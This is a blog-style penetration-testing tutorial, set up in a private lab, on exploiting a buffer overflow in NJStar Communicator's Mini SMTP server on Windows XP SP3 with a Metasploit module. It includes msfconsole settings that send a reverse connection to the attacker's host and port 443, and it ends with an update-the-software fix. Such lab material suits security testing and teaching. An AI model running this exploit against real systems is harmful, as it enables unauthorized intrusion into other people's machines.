Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5R1
Victim O.S : Windows XP SP3
Exploit Credit : Dillon Beresford
When I see this exploit 2 weeks ago I'm thinking why I never know about this software before?Because inside China itself, the most popular software for writing a Chinese character was Sogou. Maybe it's because this NJStar have English version so this software should be more popular for users outside China where they just start learn about Chinese Hanzi characters 🙂
This software also have a mini SMTP server to sending an e-mail, so just one click you can send an e-mail to every destination you want.
So how the exploit works?
According to metasploit.com this exploit will exploiting minismtp.exe because this is the only one NJStar component in memory and it's base starts with a 0x00.
1. NJstar 300 Communicator Mini SMTP Server application (download link)
2. NJstar SMTP Exploit
Attacker IP Address : 192.168.8.93
Victim IP Address : 192.168.8.94
1. Download the required file above(the application and exploit).
– Install the vulnerable application on your Windows XP SP3 machine.
– Copy the NJStar SMTP Exploit into your attacker machine and put in /pentest/exploits/framework/modules/exploits/windows/smtp/ (FYI : this location depends on where you install your metasploit framework especially for Windows user)
2. Open your terminal(CTRL+ALT+T) and run metasploit console by typing msfconsole, then use the exploit we've just added before and do not forget do describe the payload also.
3. You can view the available switch by typing show options command from your msfconsole. In the picture below was my switch configuration to make the exploit works.
msf exploit(njstar_smtp_bof) > set rhost 192.168.8.94 --> set the target IP Address rhost => 192.168.8.94 msf exploit(njstar_smtp_bof) > set lhost 192.168.8.93 --> set attacker IP Address to handle connection when exploit success lhost => 192.168.8.93 msf exploit(njstar_smtp_bof) > set lport 443 --> attacker local port to handle connection lport => 443 msf exploit(njstar_smtp_bof) > set target 0 --> set the target to windows xp sp2/sp3 target => 0
4. When everything has been set up nicely, now let's try the exploit is it works or not by running exploit command from your msfconsole.
1. Update your NJStar Communicator to the latest version.
Hope it's useful 🙂